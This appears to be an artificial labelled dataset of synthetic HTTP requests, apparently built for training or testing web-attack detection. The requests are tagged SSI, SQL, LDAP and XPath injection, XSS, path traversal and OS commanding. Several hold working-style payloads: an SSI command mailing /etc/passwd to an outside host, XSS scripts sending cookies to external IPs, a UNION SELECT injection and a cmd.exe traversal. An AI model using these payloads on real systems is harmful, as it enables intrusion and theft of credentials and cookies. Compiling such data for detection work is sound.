Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Basic b29UcnQ6cG1jdA==
Range: 929605-5,-089,269-624
Referer: /0nnyuc/aan1/utevitH.cgi
TE: trailers,deflate;q=0.4,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.2 (Windows; U; WinNT 5.6; bf-83; rv:4.4.3) Gecko/40174186
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: 9.9 134.21.37.89, 7nr/4.1 www.aWsu5Ryu.jpeg, FTP/0.4 www.estts.png
Transfer-Encoding: deflate
Upgrade: oorig/6.0, osraet/4.0
Warning: 492 17.108.254.89 "nam6dyTtRno" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38807
Start - Id: 40073
class: SSI
GET /eawietlhysIstui/eiNlocs6/sLUsfk_uOA/lsd0olnpiEielcisg/sriertreog/o_dCu-kD_MjhgGzA/fCZbo49PcPo/lCnuen9p/5e3Ht9nseaee3/nyTYuk/u1wnteAioua/llm5Blsy5ZVcN.pl?tiwcr9=5976056&gydaNnu6mR=tLLkkzv9&Tq.._0=ouoGU9QVu&hks7hwwee=315&ja0eit=sJA46prSUKsS&eAdtaa=870275691&ptSUdcKU8fO=%40tin8t%3Benph-feinputll+%3F&CooacpODps=%3C%21--+++++%23exec+++cmd%3D%22%2Fbin%2Fmail++stqysr5Y.com++++%3C++%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: www.etti.cz:86
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6, isiri-3342, utf-7;q=0.9, x-mac-arabic, iso-2022-kr;q=0.4
Accept-Encoding: *
Accept-Language: kobeyoes-tEqghih;q=0.2, eesm-al, lfnlej-4oel;q=0.1, osneiwlo-g;q=0.7
Cache-Control: no-cache
Client-ip: 53.190.46.19
Cookie: yclbdoege=hATX4;dimrut=87851720;Agw5finyr=otjg1dhsaI;oafnzz=2993253268;Hara=ame t0ac5qs
Cookie2: $Version="641"
Date: Tue, 02 Jan 07 20:07:50 GMT
ETag: "6MLClxhRoy2z2nIcv"
Expect: fpetd
From: uohepreO@9Mntu.biz
If-Modified-Since: Sun, 03 Oct 04 01:05:25 CET
If-Unmodified-Since: Sun, 19 Dec 04 11:02:49 GMT
If-Match: "R7gJHHMF2z4ELwM97an"
If-None-Match: *
If-Range: Sun, 21 Nov 04 11:37:57 UTC
Max-Forwards: 972
MIME-Version: 9.5
Pragma: natSlh='at'
Proxy-Authorization: tk5tph hFlgrdtC=taleir4
Authorization: Digest uri=http://www.neEo7.biz/thr0V/tG1tyee.swf
Range: 4-,3-,-4
Referer: /nmhnebho/Susou7.php4
TE: gzip;q=0.8,trailers
Trailer: Authorization
User-Agent: 13PfKaUJ http://www.s6ia.uk
UA-CPU: PowerPC
UA-Disp: 097,3565,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 893x680
Via: 5.0 www.hendNiam.png:429
Transfer-Encoding: deflate
Upgrade: rcieEo/9.2, esrs/5.8, kEi6/4.8
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 149.177.156.143
X-Serial-Number: 44488715
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40073
Start - Id: 37961
class: LdapInjection
GET /buZCA/oFIqoyu5rL7o/reyaecocemuohee8tEe/en39pkYB8mtosXAB.gif?5dt8h8aosDptTA=prieehtmpeettnamdl&tuasnlBoynrht=xqwAUw&7ahrttaInsaadua=471&azamB1esFjik=rehsdicsi&tseeplvecsewt=ll4utrhnu&ipqcgsSihle=alTAsaea79&huneAuPthU2e=tym+&bas=%5CfgrhcmdiAia%5Cevalthttps&T@jgv4iIn=602&4tkOdRa=38%29%28%26%28objectClass%3Dtse%29%28%7C%28sn%3D+++ptae%29%28cn%3Dtta+J*%29%29&Fhspasswdkjh_X1x=5n9KOA HTTP/1.1
Host: 247.9.150.117
Connection: omboEne
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 44eeoaoe-ov;q=0.1, uet-dyecysq
Cache-Control: min-fresh=73
Client-ip: 177.141.172.83
Cookie: yaabistglStt=jbN;jefQQGZnhg=na
Cookie2: $Version="12"
Date: Mon, 12 Sep 05 17:44:29 UTC
ETag: W/"AMXW7dHrAGf@J@P3v-"
Expect: psersns=esanan
From: ob6jr0@oucA7niAri.it
If-Modified-Since: Mon, 19 Jan 09 24:06:48 CET
If-Unmodified-Since: Sat, 08 Sep 07 19:01:25 CET
If-Match: "Zd.LX6.txXMsGynC"
If-None-Match: "16GEyzl.qkhY@m5DfNc"
If-Range: "HHGLgH@t25Ogq-B"
Max-Forwards: 184
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: ndeT l2ftnt=toae
Range: -8,482604-
Referer: http://www.iuont.de/zt6Nti/Neet.mpg
TE: trailers,trailers
Trailer: Pragma
User-Agent: tfuwp6eWd/4.7.6.0
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 3.4 227.238.161.80:3, 8.1 2.242.230.209
Transfer-Encoding: identity
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 700 www.fia1N.gif "guys2ngneaoLs2joonsi" "Fri, 30 Dec 05 15:06:31 CET"
X-Forwarded-For: 36.237.252.182
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37961
Start - Id: 48942
class: XPathInjection
GET /m-b5SHn/n2oEaHads/e5EQJnGAm6G69t/ath1pennle/SY2Jrdf%uK_AI/Y8/hTzC9zXoPCreq@C/hmxLVQTSz40Xs./lsN_QwoH4TzsfwoK/wQQ60Fm60ZJ5zJU.sh?e0agnoSav=oehTvVs%27++++or+++++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28++i++++%2Bj+++%2B+++k+%2Bl+++%2B+1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++++%27laohaum%27%3D++++%27++Igt%27++or&sTeopuv4tnoetsy=4302403222&rgcfvrDhR9a5=rF24pe&lojini=47094 HTTP/1.0
Host: 40.16.246.84:22
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: ta-ondtk4r;q=0.0, diiM1kSh-he, mAmX-an1miuat, lm-e;q=0.8
Cache-Control: En=jc
Client-ip: 163.68.137.81
Cookie: tdOa8iajweD8h=yIUZq;aeei9u8ltr=dsataktp6m;oftq6Rtwdee=73
Cookie2: $Version="818"
Date: Wed, 16 Dec 09 09:10:01 GMT
ETag: "Wnu8c7V6mR2JtbrB"
Expect: eeyqig
From: 11ria@soa2e.be
If-Modified-Since: Fri, 02 Jun 06 03:19:14 GMT
If-Unmodified-Since: Tue, 21 Jun 05 06:55:29 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Aug 06 17:40:55 UTC
Max-Forwards: 0449
MIME-Version: 8.7
Pragma: he='a'
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: NTLM OWFoNm51aXR0c3Q5Y25yOWlhdHJzbWlzZWhhc2VOaTBlcw==
Range: 326-470558,-0121
Referer: http://mbeo9N.de/cuEo5N.htm
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: o7r2/0.6.1
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 508x349
Via: 6.0 www.tOHslei.gif
Transfer-Encoding: deflate
Upgrade: tgxf/7.7, hudO/8.7, kEn/1.6, souT/0.8
Warning: 874 173.192.166.189 "RHrt5n" "Sun, 30 Mar 08 15:54:31 UTC"
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 6293000915488
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48942
Start - Id: 49027
class: XPathInjection
GET /eh4ntae9stda/dedscAlM/eZ7X0KIbPYB29.Wt/inercy/bANWC69T6jsI/eQ0@2wTGHhlXGIe9/rrbFUrProl/tiSh7cbIJBn__VVH.bin?elrnpt=rKm&GexecZI=oo&aOxhtHn_hN=eErLl%2FEece%2FonbeTc%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D0%5D+++++or++++%27Lseh%27++++%3D%27&stkbwnnyAipnnd=wp-he HTTP/1.1
Host: www.dr7Aegeo.uk
Connection: l9gp
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.4
Accept-Language: y-rdlofda8;q=0.5
Cache-Control: min-fresh=3707
Client-ip: 218.235.95.33
Cookie: YlAe=e1aernratohami;hiic=hW.0d@gw;ar=52371;O9abpidxEaRApAz=8witrso;5gVwPxMX4=43503
Cookie2: $Version="4"
Date: Sun, 22 Feb 09 08:16:04 CET
ETag: W/"vWOlh.SNHcSZbS62QoaS"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Wed, 17 May 06 13:32:42 UTC
If-Unmodified-Since: Thu, 04 Feb 10 07:50:36 UTC
If-Match: "Y61n5u2ZxBU601m6HUy"
If-None-Match: "ty_Ki87YMOpe8dpkshkX"
If-Range: *
Max-Forwards: 9
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: t597i7 s1mtW=e9ixee
Authorization: Digest algorithm=MD5-sess
Range: -31
Referer: /vohiotl.swf
TE: deflate,chunked,trailers
Trailer: Pragma
User-Agent: ta-WBOu http://www.tlbee.ch
UA-CPU: 68000
UA-Disp: 167,2899,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1840x9062
Via: 2.2 www.Ey6achcs.jpeg, HTTP/7.1 www.phar.jpeg, eerno/7.5 www.aToyah.shtml
Transfer-Encoding: compress
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 832 www.aeh0a9i.js:7 "omte8QStoehr7LPtw" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49027
Start - Id: 39834
class: SSI
GET /AeeiclxvAesnectrr/sasasWtmsdar/exelcetu/i2ehe35xolO/nIpCJD/nV43u/ciyrlnDeetnit/e@@gO@jhl/hm_.png?SdEeylfator=3lctnoe%3E%2B3llocation+&samMpaNzE2=%3C%21--++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E&VLd4=7fiSe1%24hrah9&ecg=hB9IGaD&optFHnuds=FeT%3Et HTTP/1.1
Host: www.yuhcas.ch
Connection: keep-alive
Accept: application/zip
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 92.223.213.84
Cookie: lrutzdyrua0msui=pnetwirae7eiiyO;ipvtouuO=Csebi7tatsopenEbOa=;7A
Cookie2: $Version="00"
Date: Sun, 02 Mar 08 12:53:57 GMT
ETag: W/".HClj.3fmFZ94@YR4"
Expect: 100-continue
From: Hhfthamp@seaduno.org
If-Modified-Since: Fri, 04 Mar 05 23:53:42 CET
If-Unmodified-Since: Thu, 06 Apr 06 08:11:28 UTC
If-Match: *
If-None-Match: "AOtD-Uiw2eZQ-obccV"
If-Range: *
Max-Forwards: 858
MIME-Version: 8.3
Pragma: no-cache
Authorization: Digest algorithm=MD5-sess
Referer: /guith/eoEeee/aefl9a.dll
TE: trailers
Trailer: Trailer
User-Agent: Oocnhoti0d5otizieAq
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3110x4951
Via: rsa/5.4 37.85.122.20, 9.5 www.7yenqve.js:84, 5.1 21.145.138.234
Transfer-Encoding: deflate
Upgrade: rwgy5l/4.0, iih/8.8, itn/2.2
X-Forwarded-For: 158.183.166.134
X-Serial-Number: 713018476258
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39834
Start - Id: 45612
class: PathTransversal
GET /teasEgsessnhnm/b4t4/tsEm9smghnUl/3ipttir2h/evRoi@MScucueh/phmoc/asn.html?avnSani=10&tz6telnbsoieln=+c&go7N4onda=..........................WINNTsystem.ini&Rs=t+xu&n4enSk=iBshttpssg%3El&Nw2hi=iBq9 HTTP/1.0
Host: 136.59.97.171
Connection: keep-alive
Accept: text/plain;q=0.4
Accept-Charset: *
Accept-Encoding: gzip, compress, gzip, gzip;q=0.0, identity
Accept-Language: *;q=0.2
Cache-Control: o=ih0nne
Client-ip: 54.187.183.145
Cookie: Hnteosrr15tit=eUeGe-;E4JM3ZchildXOX=Brz1ei47m7;1DhPm9c.fl=oMW;en1=aornda0sni;eshtTv=lh1
Cookie2: $Version="46"
Date: Mon, 08 Mar 10 18:39:20 CET
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: 100-continue
From: f4re3ea2@HiNl.uk
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Sat, 06 Nov 04 20:35:54 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Sep 06 06:37:08 UTC
Max-Forwards: 537
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Basic cmZzbzJvaDptdG01b21u
Range: 942-,71595-5
Referer: http://www.rTpe.be/lTbhj/he9wS/eeah.css
TE: deflate;q=0.5,trailers,chunked
Trailer: Accept-Language
User-Agent: e1emlisthn/0.1.0.3.4
UA-CPU: x86
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: 9.5 214.159.68.124, 0wuae/8.9 www.feldc.js
Transfer-Encoding: deflate
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45612
Start - Id: 36898
class: LdapInjection
GET /FQErcyRb/a7Hshafa/.PFiK/oJgUNrA5/tw3Bb6a9h0rX2nwsi.php? HTTP/1.0
Host: 146.143.224.24:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: egl='doI'
Cookie: hnaadcivbroj5Pe=tei0tna;auoteuwif9=tQ9FVH0_Y-;aAt=s;3bt=)(|  (displayName=had*)(name=    had*)(mail=had*  );tnsNod=cZ95FJqh
Cookie2: $Version="097"
Date: Fri, 15 Apr 05 12:38:15 CET
Expect: 100-continue
If-Modified-Since: Mon, 14 Sep 09 13:32:11 CET
If-None-Match: "LwH1m23Y8jH_Kwv"
If-Range: "iyC0f7.a8@wW_JVKTHo"
Max-Forwards: 23
Authorization: Digest nonce
Range: -3,-39
Referer: /awgnitix/ecyi.nsf
TE: deflate
User-Agent: o1beasDo/5.6.2
UA-Color: color8
Via: FTP/0.7 81.45.228.150
Transfer-Encoding: identity
Upgrade: een/6.0
Warning: 687 117.232.117.104:081 "Stmco58" 
X-Forwarded-For: 230.164.181.20
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36898
Start - Id: 40148
class: SSI
GET /ojNn2meSWR_G.CE0Z/Gz8PDSu-DQE/trhmywuye/wwmnembgrihmr/mssg6e7sAk/rfC81XpaH3SEjcg.msf?nmnnesfp=%3C%21++++%23%3C%21--+%23exec+++++cmd%3D%22id%22--%3E&d9=8&josrshHenrl=u5lsdlti2rttua HTTP/1.0
Host: www.ewn7ilno.net
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.0, windows-1252;q=0.0, windows-1252
Accept-Encoding: deflate;q=0.7, compress, deflate, deflate, compress
Accept-Language: *
Cache-Control: max-stale=879
Client-ip: 59.15.28.202
Cookie: Ir=4372;t9e=6745644;6iosedoe=pnh6e
Cookie2: $Version="029"
Date: Thu, 18 Nov 04 13:50:11 CET
ETag: "qmJ@VE5bg4LWn_pk"
Expect: tnhh=9reuMdud
From: stce@ygsk.st
If-Modified-Since: Sat, 05 Sep 09 20:19:26 CET
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: *
If-None-Match: *
If-Range: "xVrPC8A0zxEfnwkZ2J"
Max-Forwards: 345
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic SWJlbHQ1dGw6M25Tbm50ZQ==
Authorization: Digest qop=auth
Range: 543-5,-37763,-41932
Referer: /ohtero/ta1je9e7/obiAwlb/H7eoPn/Scipayte.conf
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 9.6; el-He; rv:4.3.2) Gecko/43898159
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5714x2082
Via: FTP/1.7 www.trrbtT.gif, FTP/8.6 245.16.69.56
Transfer-Encoding: compress
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 197.14.49.35
X-Serial-Number: 7694674190970
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40148
Start - Id: 35442
class: SqlInjection
PUT /5unionPsFZconnect4wGaKpN5/ne.wYTYRDSig2mwmRv/eJiorulh8Vg7yN/mhVZlsSQ9gandpbY/2wDql/EpG4gp59X/nOvgeE_6GBD7bhtc_/ttO99aogqin/npolWei2Airnsslrc.jpg? HTTP/1.0
Content-Length: 11
Content-Language: rRLth0,fd,egaxyo
Content-Encoding: compress
Content-Location: http://2htrxj.be/HIpoie5/inyhdo2/gnA2lur/rR8roett/lagtt.sh
Content-MD5: YnlhdGV0ZWVlNHdCdG10MA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Apr 09 17:31:06 GMT
Last-Modified: Sat, 21 Jun 08 09:16:42 UTC
Host: 146.0.209.53:57516
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: '  )/**/UNIONALL/**/SELECT/**/160/**/FROM/**/1twhi/**/WHERE/**/(   ''=  ' /**/
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 124.241.147.173
Cookie: 0dSGetc@logY4nMDR=42963125;bhbi3w=tBfNqW8lf@n;utregae0hs=usradnr;qrtxez9lrd2o=ePUl ;e6pstwunXsf=lszGqg
Cookie2: $Version="688"
Date: Wed, 16 Jul 08 17:28:13 CET
ETag: W/"GegaMDSZMOjF1Os"
Expect: yeewi
If-Modified-Since: Sat, 24 Jul 04 24:42:34 GMT
If-Unmodified-Since: Thu, 05 Feb 04 24:03:40 CET
If-Match: "n3BD_RpvCjjYl@H5I2"
If-None-Match: *
If-Range: "WD7irRBy-naZjIMqLV4"
Max-Forwards: 1
MIME-Version: 3.0
Pragma: no-cache
Authorization: Basic b3ZnY2hpZWQ6cm9XNzAz
Referer: http://www.cSdd.ch/hesr.swf
User-Agent: Mozilla/8.0 (Machintosh; U; Mac OS X 1.2; Ss-oa; rv:8.4.6) Gecko/69786871
UA-OS: Windows 95
Via: 6.2 109.211.211.196
Transfer-Encoding: identity
Warning: 040 www.aads.shtml "Lmnotfsuaiytt" "Wed, 10 Jun 09 05:28:12 CET"
X-Forwarded-For: 252.21.227.56
X-Serial-Number: 8980976
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

Hp3kKqZ=497

End - Id: 35442
Start - Id: 47494
class: XSS
GET /hmdNZbLV-3/0lZTQf_tmpXVkzXRy.tiff?positionr_u-=634&zFslo=6zlU&oemM6ngrEe9rlt=50202787&mshimr=%5B%5CxC0%5D%5B%5CxBC%5Dscript++%3E%5Bwindow.open%28%27http%3A%2F%2F155.198.69.91%2Fllenst.jsp%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+++%3E&whnstlso=cvF.Z5.QrVr&dt1=aOiE&rijefsplnne=wirpsphh0tdgpk&sorn=tOmenpnc&teoh3=8&eahIai=3645&E6elP3eccdthb=qrscerewsu07i8des&markfv=eg1&tmp2n6Uxinput5vbscriptd=la3sum%5Cs HTTP/1.1
Host: www.evmeetrN.cz:3
Connection: tdHbaqe
Accept: text/*, audio/basic;q=0.9
Accept-Charset: windows-1250;q=0.0, gb2312;q=0.7, iso-8859-4;q=0.3, windows-1255;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=3
Client-ip: 229.228.100.156
Cookie: auoeidnoTtyle9S=ka(l6reh
Cookie2: $Version="1"
Date: Wed, 19 Dec 07 24:26:33 UTC
ETag: "Fp1oJVXIDfwd1iWhR"
Expect: 100-continue
From: hD4h@iejie.gov
If-Modified-Since: Fri, 21 Jan 05 04:30:17 GMT
If-Unmodified-Since: Sun, 10 Dec 06 23:13:07 CET
If-Match: "GKCL4FOC3.@LDi.z6@07"
If-None-Match: "-d7mEccy.PWPKU7xY"
If-Range: *
Max-Forwards: 9799
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: NTLM aWVxcDJhdDdkc2RhZWVkaFM3YTBkeW5sZmc5bG1wcHl1RWlvZW9tc25sZQ==
Range: 9183-933,-0
Referer: /eape.php4
TE: gzip,gzip;q=0.2
Trailer: Authorization
User-Agent: Mozilla/4.1 (X11; U; Solaris 6.5; 7g-hi; rv:5.0.0) Gecko/18604597
UA-CPU: x86
UA-Disp: 612,9205,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 206x914
Via: HTTP/9.4 www.ejrn.htm:2, 1sr/9.7 www.drulhe.jpeg:1312, nemoo/7.5 201.208.252.6
Transfer-Encoding: identity
Upgrade: mrsd/9.5, owur/3.3
Warning: 377 www.ttf1aee.tiff:8 "utk7eeufto6reia" "Thu, 23 Jul 09 20:34:19 CET"
X-Forwarded-For: 121.171.235.172
X-Serial-Number: 48112496441051
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47494
Start - Id: 47294
class: XSS
GET /b7fCBw0gLfnEdVuco3/jJPJAL/ns2szaVtmxntkgQSV-.w.htm?UlCny=%3Cbody+++onload+%3D++%22%5Bwindow.open%28%27http%3A%2F%2F62.177.174.132%2Fstndre.jsp%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E HTTP/1.0
Host: www.u5elaSoE.cz
Connection: sbfjde
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=34
Client-ip: 156.129.47.155
Cookie: rpLQEexecbcr=2890;Ifnnfonl=77903127;seitemxrrTimat=:gandue
Cookie2: $Version="1"
Date: Fri, 14 Nov 08 08:31:33 UTC
ETag: W/"Ti_gfcR2jdX5V4dGY0n"
Expect: mTIktib
From: peTeu9@mayraae.fr
If-Modified-Since: Fri, 12 May 06 12:24:41 CET
If-Unmodified-Since: Thu, 13 Mar 08 16:58:42 GMT
If-Match: "-d5SuXqeQI5AJe7AjSc"
If-None-Match: "GcZHi2whA6FPACm0_"
If-Range: Fri, 11 Mar 05 15:25:06 UTC
Max-Forwards: 634
MIME-Version: 1.9
Pragma: v='insBwIv'
Proxy-Authorization: Digest realm
Authorization: rjne svdhj5us=dhtnra
Range: -4,7256-5,39-5314
Referer: /infn6hf4.mdb
TE: gzip
Trailer: Accept-Encoding
User-Agent: iLMZ9W_MX http://www.ysie.fr
UA-CPU: Sparc
UA-Disp: 7412,103,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 979x278
Via: 5.3 10.250.186.184, FTP/5.4 129.12.128.189
Transfer-Encoding: deflate
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 7.96.3.255
X-Serial-Number: 269675731221597037
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47294
Start - Id: 36474
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: 110.74.250.5:50724
Connection: rTdlnpr8
Accept: text/*, text/xml
Accept-Charset: euc-cn, iso-8859-2, shift_jis;q=0.6, windows-1257;q=0.5, iso-2022-kr;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=0529
Client-ip: 4.98.22.198
Cookie: lcqhdrhtcrha5yl=n0rptheohgioesoin4;NWEE0g.jmconnectSr=eon69is;waeaeieithme=osock_streamm;a8=ei0B;hia4eEieteHrahh=osqsnat8
Cookie2: $Version="987"
Date: Tue, 13 Feb 07 05:00:22 UTC
ETag: "b.tqILcRPgjyibN"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Mon, 04 Jul 05 22:45:41 GMT
If-Unmodified-Since: Thu, 05 Jan 06 12:22:59 GMT
If-Match: "QZD.TK-Qom_HbzY_.p"
If-None-Match: *
If-Range: Fri, 25 Apr 08 10:27:49 GMT
Max-Forwards: 436
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM bHBzYWVzaGVBdXcycmhkQXNvbG9PYmVPSW0zZU1rRVJhZXo=
Range: 57-,410056-,436232-1281
Referer: /gwroproI/eIor/foh2e/p0tTr/gettc.gif
TE: trailers,deflate
Trailer: Date
User-Agent: Mozilla/4.0 (compatible; MSIE 7.5; Mac OS X; adtl; LAht7s)
UA-CPU: Sparc
UA-Disp: 8174,3331,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: HTTP/7.5 250.189.133.153
Transfer-Encoding: identity
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: ---------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 36474
Start - Id: 49456
class: XPathInjection
GET /t9h/ehXZOeedd.I/mcf1le/E5soblvfLlem/arj4relrsr/tntpftodv.css?orgTeIl=tlnp++&iSr3dsgipaT=%2Fdf%2Brcmdeelinkstnei&1yxusmlirm=asedsOe5lEanik&reNnaNu=32+++or++++rilsea%2Fd2%2Fnualu%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D32%5D+++++or+++32%3D&otenIcnjodUnnfm=vzscripteres&VwZwFX=zlecara6ga9oesn8&sam3ecdhbdfM=DXi&mw=tTJduip_Jzwf HTTP/1.0
Host: 30.71.245.26:92967
Connection: e8itptTy
Accept: */*;q=0.2
Accept-Charset: ks_c_5601-1987;q=0.3, x-mac-ce, iso-8859-1;q=0.8, x-mac-chinesesimp, shift_jis
Accept-Encoding: 
Accept-Language: i-sceOisr9, esne-eloLg
Cache-Control: no-store
Client-ip: 241.130.105.59
Cookie: sGMhpOnlgto=boot.ininoc@pOTtndocument lx;utnqenbneceagao=asxtermssJ]hs:;tEhgs3ieggnne5=smlfmlaneh|erc0binfi;arueR=oW7j
Cookie2: $Version="817"
Date: Sun, 16 Nov 08 02:12:26 CET
ETag: W/"kUU6QrCkb-GxGP.IGM"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Thu, 25 Dec 08 18:25:57 CET
If-Unmodified-Since: Sun, 13 Dec 09 23:43:14 UTC
If-Match: "vRcBu9hPH_EqJcU"
If-None-Match: "Sb@O847m98Y6FOFIJT8"
If-Range: *
Max-Forwards: 0307
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: rrse TEfia=s7duouae
Authorization: Digest qop=auth-int
Range: -012
Referer: http://www.useo.gov/eevp/x2oi/Aeecl/imice5ts/ot4ul.asmx
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.2 (compatible; eeeChpkts; WinNT; aleinhlves)
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 527x1451
Via: 4.6 www.h82kioE.jpg
Transfer-Encoding: identity
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 125.87.11.223
X-Serial-Number: 812184590933752195
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49456
Start - Id: 48977
class: XPathInjection
GET /BbYDoGt/hqi_8m1IQ/rEph3SZt/TirVimg4Row6bWNT3/bhdneId/s5CBnOxEu_xlWwhiUj.sh?ygIxvkM=%28i+++++%3C+++count%28acN%2Fchild%3A%3Atext%28%29%29+++++and+j++%3C++++count%28XEtXlo%2Fchild%3A%3Acomment%28%29%29+++and++k++++%3C++++count%28obdj%2Fchild%3A%3A*%29++++%29&Kkycx=cmdbsock_streamfromna45rTrneameta&wiz@Gve6=515&ahmiNiiTnth=7&8nlaelwshl=t%28d8+&Gacdht=4759&kOvXH5Ji5DKlib=a%29k%5B&mml=aktitwp&mocha8c0_=statiaW&9ssxfh=7n2s&L4eval4=ija HTTP/1.1
Host: www.81oidfdaeo.gov
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-korean;q=0.1
Accept-Encoding: deflate;q=0.1
